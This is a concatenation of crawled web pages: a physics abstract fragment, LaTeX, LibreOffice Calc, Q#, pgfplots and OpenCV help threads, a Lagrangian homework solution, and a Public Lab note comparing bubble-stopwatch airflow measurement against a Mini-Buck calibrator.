using the dressing formalism, we obtain an analogous result: In either framework, outgoing hard momentum states at late times are fully decohered from not having access to the soft bosons. Finally, we make the connection between our results and the framework of asymptotic symmetries of QED and gravity. We give new evidence for the use of the dressed formalism by exhibiting an inconsistency in the scattering of wavepackets in the original inclusive cross-section framework.
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8621944785118103, "perplexity": 664.8456103681248}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662619221.81/warc/CC-MAIN-20220526162749-20220526192749-00142.warc.gz"}
http://tex.stackexchange.com/questions/linked/2063?sort=newest
21 views ### Standalone package installation [duplicate] I want to include a table in a tex file and I get this error: ! LaTeX Error: File `standalone.sty' not found. Type X to quit or to proceed, or enter new name. (Default extension: sty) Enter file ... 71 views ### Installing .zip packages with the MiKTeX package manager from a local repository [duplicate] I'm in a network where I have to use local package repository. I would like to add some packages to this repository so that all computers using this repository can install it via the MiKTeX package ... 934 views ### How to draw the cards of a deck? How to draw the cards from a deck using a Latex package, as TikZ? 815 views ### Package breqn is broken since MiKTeX removed package mh I just updated my MiKTeX 2.9 installation and the package mh was removed as is outdated. Now the package breqn won't compile. Whenever I compile my document with breqn active, I'm prompted to download ... 83 views ### About LaTeX for a beginner [closed] Hullo, Im just starting up with LaTeX. I keep getting error messages even though I feel as though everything has been done correctly. I am just doing the intro exercise which is shown from the help ... 191 views ### Macro for moving hat symbol up I use mathpazo font package and I think the hat symbol is too low. Can I make a macro to change behavior of all my hats? This question has a good example, but I don't want to have to retype all of ... 40 views My notebook crushed and I copied my latex files to another pc. I tried to run my file which creates my cv and cover letter, however I get the error message: moderntimeline.sty not found I ... 12k views ### How to install mathtools package? I'm new to Latex so forgive me if the questions are dumb... I was trying to right left-top corner superscript, someone recommended mathtools package on this forum: Left and right subscript. So I ... 109 views ### Accanthis font simple usage I am using the Latex Font catalog: http://www.tug.dk/FontCatalogue/ I can set some of the fonts, however I cannot set a lot that I want. For example, I can set "Carolmin" effectively in a document. ...
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.964632511138916, "perplexity": 3978.4579212397566}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-52/segments/1419447562872.37/warc/CC-MAIN-20141224185922-00032-ip-10-231-17-201.ec2.internal.warc.gz"}
https://ask.libreoffice.org/en/question/176298/reference-cells-for-countif-calc/
# "Reference" Cells for COUNTIF (Calc) edit Hello! I have a spreadsheet with much information about my school. Specifically speaking, the names of the students occupy a column of this spreadsheet, while at the same time the other columns carry information about each student, including the elective lessons he/she has chosen to attend (for example History, Sociology, e.t.c.). Each student belongs to a group, and each group belongs to a class (year) of my school. I need to make statistics for each group, each class (year) and the whole school, for counting how many students have chosen each one of the elective lessons. It would be really useful if I could use COUNTIF by defining the "range" of cells of each group DYNAMICALLY. I mean that instead of defining directly the range of cells for COUNTIF, it would be more effective and efficient if the first and last of this "range" could be "variables" which could be stored in other cells. For example, instead of defining directly the range for the group A1 as D5:D30, I need to store the information "D5" and "D30" in other cells (for example Z1 and Z2 respectively), and address the COUNTIF to these cells (Z1 and Z2). This is highly useful, since each year the range of cells for each group changes, and this approach needs just to change the values of the cells Z1 and Z2. Is it possible to do it? How? Thanks a lot! edit retag close merge delete Of course it is possible! The best and easiest way is to use Base, not Calc. Don't be angry, this is just a joke. But in every joke there is only a fraction of a joke - everything else is true. ( 2018-12-15 11:15:24 +0200 )edit ( 2018-12-15 11:31:43 +0200 )edit Sort by » oldest newest most voted In addition to the suggestions by @JohnSUN: There is also the function OFFSET() capable of returning a cell- or a range-reference calculated from parameter values. To address cells or cell ranges in text-form there is the ADDRESS() function. The function INDEX() helps to extract specific parts from an array (data from a rectangular range). It supports single_array-row, single_array-column, and single_array-element. All the mentioned means, at least if used with variables instead of constants only on parameter positions share a serious disadvantage: The routines of Calc organising recalculation cannot know exactly about cells needing recalculation due to probable changes in the parameters. Therefore these functions are treated as "volatile" and thus recalculate "on any change". For large sheets this is inefficient and may afflict usability with AutoCalculate enabled. Not just as a joke: A thoroughly developed database is the means of choice for your task. I don't know anything about yours school. I myself was in charge for 10 years of doing things you are talking of for a school of up to 100 teachers and 1150 students. It wouldn't only have been inefficient to do it spreadsheet-based, but also unlawful due to legal norms of my country/state concerning data security, data safety, and privacy. I also well know the disadvantages coming with the obligation to use a closed ready-made database system. Life is hard, after all. more Thank you both for your answers! It seems that you are really experienced users! The problem is that I use this spreadsheet for both storing data (information about the students) and for creating the timetable for my school (which needs all this information). For creating the timetable, I used the spreadsheet "approach" since I know how to check for errors. Can a database system cover both my needs? The spreadsheet checks for the timetable PLUS the statistics? Thanks again! ( 2018-12-15 14:38:04 +0200 )edit I neither know your country nor anything about the school system you are working in or any specifics (number of teachers and students eg) of your school. In the system and for the specific school i mentioned, the creation of a "time table" (detailed schedule for anything related to teaching classes) needed to be split. A first task was to assign resources (teachers and rooms mainly) to the planned/needed lessons. The second part then was the detailed scheduling. Under the specific conditions I have experiences with I had no chance to do that all with one homemade bundle of spreadsheets, even if I resorted to unlawful means. For the first part I had to work with two databases (this was abandoned meanwile) and some intermediary spreadsheets and some special "hardware" for "creative" work. For the second part I passed the results to a specialised program and to a person ...(more) ( 2018-12-15 15:01:50 +0200 )edit Thanks again! Some further details: My school has many private-like musical instrument lessons. This means one teacher teaches to one student (or sometimes to 2-3 students). Of course, I can use a specialized timetabling application, but this is really complicated. Even for just entering the data, I need too much time. So, in order to create the timetable (detailed schedule of my school), I use a spreadsheet and I assign each student to his/her teachers. The spreadsheet is "programmed" so that I can see when a student is not available or not, I can check if all students have the correct lessons and the correct number of hours, if the teachers have the correct number of hours, etc. Of course the spreadsheet carries all the needed information. I.e. group for each one of the students, musical instrument, teacher name, etc. For the part of information needed (and the ...(more) ( 2018-12-15 15:38:24 +0200 )edit Yes. If this is for up to 80 or 100 students, and you are decisive to solve upcoming problems again and again, you may do it with spreadsheets (the privacy complex aside). From my experience it's much easier to work in a creative way with spreadsheets (as compared with database frontends) - and it's even a bit of fun sometimes. It's much more complicated and error-prone however concerning data-safety, security (including backupping and all that). It brings hard responsibilties. To advise concerning the how is difficult. There are only a few principles like: Don't mix up different functionalities in one sheet. In sheets to keep (and maintain) data regard te most basic principles of databasing and in addition some only applying if working with spreadsheets (except when re-building completely): - Don't physically delete. Mark "deleted" instead. - Don't change sort-order in data sheets. (Sort with option 'Copy ...(more) ( 2018-12-15 16:09:51 +0200 )edit • Study the database-like tools of Calc like filters and specifically pivot tables. • Avoid user code (with few exceptions). Concerning database principles you may read something like https://www.essentialsql.com/get-read... eg. (I didn't study this thoroughly myself, however.) ( 2018-12-15 16:16:40 +0200 )edit Thanks a lot! ( 2018-12-15 16:23:06 +0200 )edit =COUNTIF(INDIRECT(Z1&":"&Z2);"<your condition>") Then add the OFFSET() function to shift your attention to the adjacent range of the same size =COUNTIF(OFFSET(INDIRECT(Z1&":"&Z2);0;1);"<your condition>") more Hello JohnSUN! The other columns of my spreadsheet carry other types of information. For example, while column D carries the information of the elective lessons, column E (let's say cells E5 to E30 for group A1) might carry the information of gender (male, female) for each student. So, if I need to make statistics for the students' gender, I need to refer indirectly to the cells E5 and E30, which means: I need to use IDENTICAL rows with the cells D5 and D50, but different COLUMNS. I was thinking of adding this information (corresponding columns for example, D, E, etc) to some specific cells and the "range" 5 to 30 (for the group A1) to different cells. Is it possible for INDIRECT to read (indirectly) both the values of the column (for example D, which is entered in the cell Z1) and the values of the number of the ...(more) ( 2018-12-15 13:23:19 +0200 )edit INDIRECT simply interprets the text passed to it on the single parameter position as a text-representation of a reference (often called an address) and returns the functional reference itself. The mentioned address you can calculate [compose by CONCATENATE() / & operator / SUBSTITUTE() / LEFT() or whatever means] in any way you want. INDIRECT will not know how you did it. It only gets passed the result. ( 2018-12-15 13:51:33 +0200 )edit
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.33163732290267944, "perplexity": 2060.720911812268}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986672431.45/warc/CC-MAIN-20191016235542-20191017023042-00438.warc.gz"}
https://quantumcomputing.stackexchange.com/questions/5877/how-do-i-do-printf-debugging-in-q-in-a-convenient-way
# How do I do printf debugging in Q# in a convenient way? When initially writing an operator in Q#, I often want to see intermediate values of registers during the computation. This allows me to check that I haven't made mistakes. For example, if I was writing an addition circuit I would input a computational basis state and print out the computational basis states of qubits at particular key points. I am not aware of a way to do this conveniently. If I print out the qubits like Message(\$"{qubit}") then I get their IDs instead of their values. That makes sense. I have to do a measurement to access their value. But if I do a measurement, then Q# will e.g. not automatically generate an adjoint operation and this tends to cause compilation failures. Also, I don't actually want to perform a measurement (which may have side effects) I just want to peek at the simulator state. (I originally thought I could package the concept of "peeking" at a value into an operation that did a hidden measurement, which would have resolved the issue. But Q# doesn't allow operations with an adjoint to have a return type.) Is there some built-in way to get at the computational basis value of some qubits, and print it to the console during simulation under the Toffoli simulator? For Toffoli simulator in particular, DumpRegister will provide this information. For example, the following code operation XorTest() : Bool { using ((a, b) = (Qubit[2], Qubit[2])) { // initialize: a = 1, b = 2 ApplyPauli([PauliI, PauliX], a); ApplyPauli([PauliX, PauliI], b); // check initialization Message("a = "); DumpRegister((), a); Message("b = "); DumpRegister((), b); // calculate a ⊕ b and write it to b CNOT(a[0], b[0]); CNOT(a[1], b[1]); // check result: a ⊕ b = 3 Message("a xor b = "); DumpRegister((), b); } return true; } will print the following result (and throw an exception in the end because the qubits are released not in zero state): a = State: 0: False 1: True b = State: 2: True 3: False a xor b = State: 2: True 3: True The numbers before values are qubit ids.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.38024523854255676, "perplexity": 2188.618909813356}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347425148.64/warc/CC-MAIN-20200602130925-20200602160925-00015.warc.gz"}
http://planetmath.org/topologicalentropy
topological entropy Primary tabs Synonym: entropy Type of Math Object: Definition Major Section: Reference Mathematics Subject Classification entropy of ergodic and mixing processes Very interesting definition. If I grok it correctly, it seems to be saying that ergodic processes will have a low entropy in general, which is surprising and counter-intuitive. The only systems I can think of that would have high entropy would be dissipative systems, where, on iteration, large portions of the space ''X'' are abandoned during iteration, and never visited again. So ... its this entropy in fact a measure of dissipation? Can any other intuitive interpretations can be added? --linas Re: entropy of ergodic and mixing processes Never mind. I've (once again) got the definition exactly upside-down. Re: entropy of ergodic and mixing processes Soo .. is there any way to simply erase/retract/edit/modify this line of posts? I clearly misread the defn, (again), so the comment I just made earlier is nonsense.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 23, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9727462530136108, "perplexity": 2331.805006627683}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-15/segments/1398223207985.17/warc/CC-MAIN-20140423032007-00338-ip-10-147-4-33.ec2.internal.warc.gz"}
http://me598.wikidot.com/homework-3-problem-10
Homework 3 Problem 10 Problem Give an example of a Lagrangian system that has a degenerate Lagrangian $L:T \mathbb{R}^{2}\rightarrow \mathbb{R}$ but a second-order Lagrangian vector field $Z_{L}$. Melih's Solution: Let (1) \begin{align} L:T\mathbb{R}^{2}\rightarrow \mathbb{R}:(q_{1},q_{2},\dot{q}_{1},\dot{q}_{2})\mapsto \pounds =\frac{1}{2}\dot{q}_{1}^{2}+\frac{1}{2}q_{1}^{2}q_{2}+\lambda \dot{q}_{2} \end{align} Using this, we can obtain a coordinate expression for the this Lagrangian as $4\times 4$ matrix. Let $B$ be the the skew-symmetrization of $\frac{\partial ^{2}L}{\partial \dot{q}_{i}\partial q_{j}}$. (2) \begin{array} {ll} \Omega_L& =\begin{bmatrix} B & \left[ \frac{\partial ^{2}L}{\partial \dot{q}_{i}\partial \dot{q}_{j}}\right] \\ \left[ -\frac{\partial ^{2}L}{\partial \dot{q}_{i}\partial \dot{q}_{j}}\right] & 0 \end{bmatrix}\\~\\ &= \begin{bmatrix}0 & 0 & 1 & 0 \\ 0 & 0 & 0 & 0 \\ -1 & 0 & 0 & 0 \\ 0 & 0 & 0 & 0\end{bmatrix} \end{array} This is singular at every point so the Lagrangian is denerate. Also note that the dynamics of that bead moving in the plane has a constraint on the velocity in $2$-direction. The Legendre transform; $FL:T\mathbb{R}^{2}\rightarrow T^{\ast }\mathbb{R}^{2}$ $:(q_{i},\dot{q}_{i})\mapsto \left( q_{i},\frac{\partial L}{\partial \dot{q}_{i}}\right)$ is found as, (3) \begin{align} FL=(q_{1},q_{2},\dot{q}_{1},\lambda ) \end{align} The action of $L$; $A:T\mathbb{R}^{2}\rightarrow \mathbb{R}:(q_{1},q_{2}, \dot{q}_{1},\dot{q}_{2})\mapsto A=FL(v)\cdot v$ for $v\in T_{q}\mathbb{R}^{2}\Rightarrow$ (4) \begin{align} A=\left\langle \frac{\partial L}{\partial \dot{q}_{i}},\dot{q}% _{i}\right\rangle =\dot{q}_{1}^{2}+\lambda \dot{q}_{2}. \end{align} The energy of $L$; (5) \begin{align} E:T\mathbb{R}^{2}\rightarrow \mathbb{R}:(q_{1},q_{2},\dot{q}_{1},\dot{q}_{2})\mapsto E=A-L=(\dot{q}_{1}^{2}+\lambda\dot{q}_{2})-(\frac{1}{2}\dot{q}_{1}^{2}+\frac{1}{2}q_{1}^{2}q_{2}+\lambda\dot{q}_{2})=\frac{1}{2}\dot{q}_{1}^{2}-\frac{1}{2}q_{1}^{2}q_{2}\Rightarrow \end{align} (6) \begin{align} dE=\dot{q}_{1}d\dot{q}_{1}-q_{1}q_{2}dq_{1}-\frac{1}{2}q_{1}^{2}dq_{2}. \end{align} Since, $dE=Z_{L}\lrcorner \Omega _{L}+w$, where (7) \begin{align} \Omega _{L}=\frac{\partial^{2}L}{\partial \dot{q}_{i}\partial q_{j}}dq_{i}\wedge dq_{j}+\frac{\partial^{2}L}{\partial \dot{q}_{i}\partial \dot{q}_{j}}dq_{i}\wedge d\dot{q}_{j}=dq_{1}\wedge d\dot{q}_{1} \end{align} and $w$ is the one form exterior force; (8) \begin{align} Z_{L} =(\dot{q}_{1},-q_{1}q_{2}) \end{align} (9) \begin{align} w =-\frac{1}{2}q_{1}^{2}dq_{2} \end{align} i.e. there exists a second order vector field, $Z_{L}$, such that; (10) \begin{align} Z_{L_{q_{1}}} &=&\dot{q}_{1} \end{align} (11) \begin{align} Z_{L_{\dot{q}_{1}}} &=&-q_{1}q_{2} \end{align} with the constraint; $\dot{q}_{2}=0$. Discussion Please check the Lagrangian I suggested. page revision: 3, last edited: 21 Apr 2007 21:31
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 10, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9999972581863403, "perplexity": 4551.640732846266}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-51/segments/1512948511435.4/warc/CC-MAIN-20171210235516-20171211015516-00350.warc.gz"}
http://tex.stackexchange.com/questions/297590/unable-to-plot-both-axes-and-arccos-function-in-pgfplots
# Unable to plot both axes and arccos function in pgfplots What I want to plot is 3 functions: x=0, y=0, and x=cos^{-1}(x). The plot and graph of the first two look like this: \begin{center} \begin{tikzpicture} \begin{axis}[domain = -1:1, samples = 500, grid = both] \addlegendentry{$x=0$} \addlegendentry{$y=0$} \end{axis} \end{tikzpicture} \end{center} \begin{center} \begin{tikzpicture} \begin{axis}[domain = -1:1, samples = 500, grid = both] \addlegendentry{$x=0$} \addlegendentry{$y=0$} \addlegendentry{$\cos^{-1}(x)$} \end{axis} \end{tikzpicture} \end{center} Everything gets messed up. Why is this? - The horizontal domain gives the impression that nothing has changed but because you have suddenly increased the vertical axis to 150 domain=-1:1 becomes invisible. Also you are using 500 samples to constant plots. Supply individually instead, here is with 130 \begin{tikzpicture} \begin{axis}[grid = both,samples=2] \addlegendentry{$x=0$} \addlegendentry{$y=0$} \addplot[draw = blue,samples = 101,domain = -1:1] {acos(x)}; \addlegendentry{$\cos^{-1}(x)$} \end{axis} \end{tikzpicture} - That makes a lot of sense! It didn't occur to me that this was the issue because in my mind domain was the opposite direction. And thank you for the suggestion about the samples! – Abe Fehr Mar 6 at 13:17 @AbeFehr My pleasure – percusse Mar 6 at 13:54 As it turns out, pgfplots (and the underlying PGF, I think) treat the input to trigonometric functions as degrees, not radians. You can force it to be in radians by the key trig format=rad. This also fixes your y-domain issues: \documentclass{standalone} \usepackage{pgfplots} \pgfplotsset{compat=1.13} \begin{document} \begin{tikzpicture} \begin{axis}[domain = -1:1, samples = 500, grid = both] \addlegendentry{$x=0$} \addlegendentry{$y=0$} \addlegendentry{$\cos^{-1}(x)$}
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8496245741844177, "perplexity": 2405.8231202005554}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-26/segments/1466783397795.31/warc/CC-MAIN-20160624154957-00144-ip-10-164-35-72.ec2.internal.warc.gz"}
https://answers.opencv.org/answers/14542/revisions/
# Revision history [back] usually they contain the old c-api functionality. you should never need to include them directly to access the c-api, you'd go like: #include <opencv/highgui.h> for the c++ (2.x) api: #include <opencv2/highgui/highgui.hpp> don't resolve to hacking, you won't get far that way. there must be something wrong in your vcproj file, or the install. there's 2 ways to get the headers right: • easy(using the prebuilt stuff: point your "Additional Include Dirs" at opencv/build/include (it should just work , if that folder contains all the nessecary headers). note that if you build your own libs, cmake might install the headers in a "build/install/include" folder, check with cmake-gui, where things go! • hard(but safe): point your "Additional Include Dirs" at opencv/include, additionally for each module, add it's module path, like opencv/modules/highgui/include opencv/modules/core/include ,... (that's what cmake does, when you ask it to generate your own project depending on opencv) usually they contain the old c-api functionality. you should never need to include them directly to access the c-api, you'd go like: #include <opencv/highgui.h> for the c++ (2.x) api: #include <opencv2/highgui/highgui.hpp> don't resolve to hacking, you won't get far that way. there must be something wrong in your vcproj file, or the install. there's 2 ways to get the headers right: • easy(using the prebuilt stuff: point your "Additional Include Dirs" at opencv/build/include (it should just work , if that folder contains all the nessecary headers). note that if you build your own libs, cmake might install the headers in a "build/install/include" folder, check with cmake-gui, where things go! • hard(but safe): point your "Additional Include Dirs" at opencv/include, additionally for each module, add it's module path, like opencv/modules/highgui/include opencv/modules/core/include opencv/modules/highgui/include opencv/modules/core/include ,... more work, but this way, you don't depend on install things. (that's what cmake does, when you ask it to generate your own project depending on opencv)
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.15014946460723877, "perplexity": 18114.650172394602}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178356456.56/warc/CC-MAIN-20210226085543-20210226115543-00419.warc.gz"}
https://publiclab.org/notes/mathew/06-11-2015/mini-buck-vs-the-bubbles
# Mini-Buck vs. the Bubbles by mathew | 11 Jun 00:14 mathew was awarded the Empiricism Barnstar by liz for their work in this research note. ### What I want to do Compare the $10 stopwatch & bubbles airflow monitoring technique @davidmack suggested to a$970 NIST-traceable pump calibrator called the mini-buck recommended to @NickShapiro. ### My attempt and results It was a bit sensational to call this research note "Mini-Buck vs. the Bubbles" since the Mini-Buck is an automated bubble measuring machine. A breakdown of how it works and is designed in the bottom section, "How the mini-buck works." For this comparison I checked the flow of 3 used formaldehyde tubes and our lending library air pump prototype. I used the Mini-buck and the same graduated cylinder and bubbles method detailed here. Tube#1 Times to travel 200ml: 36.67, 36.54, 36.36. Mini-Buck flow rate: 335L/m (three identical tests) Tube #2 Times to travel 200ml: 38.90, 38.74, 38.78. Mini-Buck flow rate: 313L/m two tests at 313, one at 312 Tube #3 Times to travel 200ml: 39.78, 39.64, 39.57. Mini-Buck flow rate: 305 (three identical tests) ### Questions and next steps My polypropylene graduated cylinder has a flow reading 1-2% lower than the mini-Buck. This could be the tolerances of the cylinder, or temperature dependent, as it is calibrated for 20 degrees and I did these tests at 27 (Celsius). I'm not going to apply a correction for now, I think more work is needed to prove that. Overall though, I'm impressed with the performance of the graduated cylinder and stopwatch. ### how the Mini-Buck M-30 works Mini-buck is a design in the public domain now, since its patent (4860590) expired several years ago. How it works: The measurement chamber is made out of a transparent acrylic tube*. On the bottom is a reservoir for bubble solution, and a spring-powered bubble wand with a wider diameter than the acrylic tube. When the button is depressed a bubble is made on the wand. as the wand moves back up to the acrylic tube, the bubble attaches itself evenly to the tube's bottom. *I'm guessing the tube is acrylic since there are warnings about cleaning with acetone. It may be polycarbonate, as suggested in the patent. The bubbles always travel upwards, and to get the tube soaped up, one repeatedly presses the button to send bubbles up the acrylic tube until they start making it to the top (see above). At the top of the chamber is a catchment for the bubbles to prevent them from entering the air line. the main acrylic tube is capped, and below the cap are four holes offset evenly around the circle. These holes exit into a wider tube surrounding the capped top of the main tube. From there a 1/4" air hose nipple draws air. Depending on whether one wants to pull or push air through the chamber, the air line is attached to the top or bottom, and the second air line connector left open to the atmosphere: The mini buck automates bubble detection with two matched sets of infrared emitters and sensors. When a bubble passes up the chamber an IR diode detects an interruption in the infrared light coming off an LED. A view of the two detectors: With the chamber taken out, the sensors can be seen oriented opposite each other. Note the IR LED's light is choked down by a pinhole in the case. That may be why I couldn't seem to get a reading on the LEDs with a Public Lab Spectrometer. I tried reflecting them off paper and other materials but to no avail. They could also be 960nm or another wavelength that the spectrometer isn't very sensitive in. Inside the MiniBuck is a PIC16F914, an 8-bit microcontroller running at 8mhz, with an internal real time clock, and a LMC6464 amplifier I'm assuming is used to either amplify the signal from the IR photodiodes or power the LEDS. Calibrating the Mini-Buck: The manual recommends calibration to a NIST-traceable stopwatch and a bubble traveling through a NIST-traceable 1000ml Buret at a flow rate of 1L/m. ### Why I'm interested We have to figure out how to measure the flow of both particle monitors and formaldehyde tubes. One of the central questions of the Open Air projects is how much air is going through devices. It is heartening to think that the difference in precision between a $10 and a$1000 flow meter is 1-2%. That said, the mini-buck is a lot less messy and much quicker. Wow, very cool. I'm thinking of what kinds of vessels could be easily adapted to a DIY version of the sort of spring-loaded bubble making frame in the Mini Buck. Maybe like two nested cylinders , with a spring between... hang on, i'll doodle it. OK, what about a pair of electric wires at the top which are connected by the bubble membrane before it's popped? And a rubber band based harness for dipping? Is this a question? Click here to post it to the Questions page. @warren How do you start the timer? I don't see a sensor for the start, only the end. Another set of electrodes appear necessary. Will that set of electrodes pop the bubble? A bubble will have to be formed before air flow starts or you will blow bubbles thru the bubble juice which perhaps will be bad.. Unless the cylinder is kept very still (vertically) the bubble will not represent an accurate volume measurement. This configuration only works for blow and not suck. An attachment for the tube would need to be fixed to the top where the hose would have to kept still during the measurement. I like the bubble management of the Buck. Only a small rod to seal and the flow does not have to be interrupted to start a bubble. Your gasket may have a problem with leaks Can you add salt to a bubble solution to make it more conductive and still have good bubble forming characteristics? Is it conductive enough (what ever that means) without adding salt? The cylinder volume can be calibrated with water and a sensitive balance or accurate graduated cylinder. Is this a question? Click here to post it to the Questions page. Yeah Dan, I later realized that a draw valve at the top would be better than a push valve at the bottom, and I think it'd mean the gasket would be unnecessary. @mathew Great work and the title is appropriate! Sometimes when I’d compare instruments head to head it would be referred to a “shoot out”—an instrument dual of sorts. A few observations: 1. I’d like to see multiple Buck tests per test flow rate—at least three to show how precise the Buck performs but take more since it's so easy to use. Any bubble meter, whether it’s a DIY cylinder or a commercial timed system, is prone to errant readings caused by oddly shaped bubbles. 2. The last tube 2 cylinder time of 39.78 seconds looks like an error and could be transposed incorrectly from your notes since it’s the exact same time as the first time for tube 3. 3. This analysis quickly becomes a question of “how close is close enough?” I wouldn’t assume the Buck is perfect and all the flaws are that of the cylinder method. 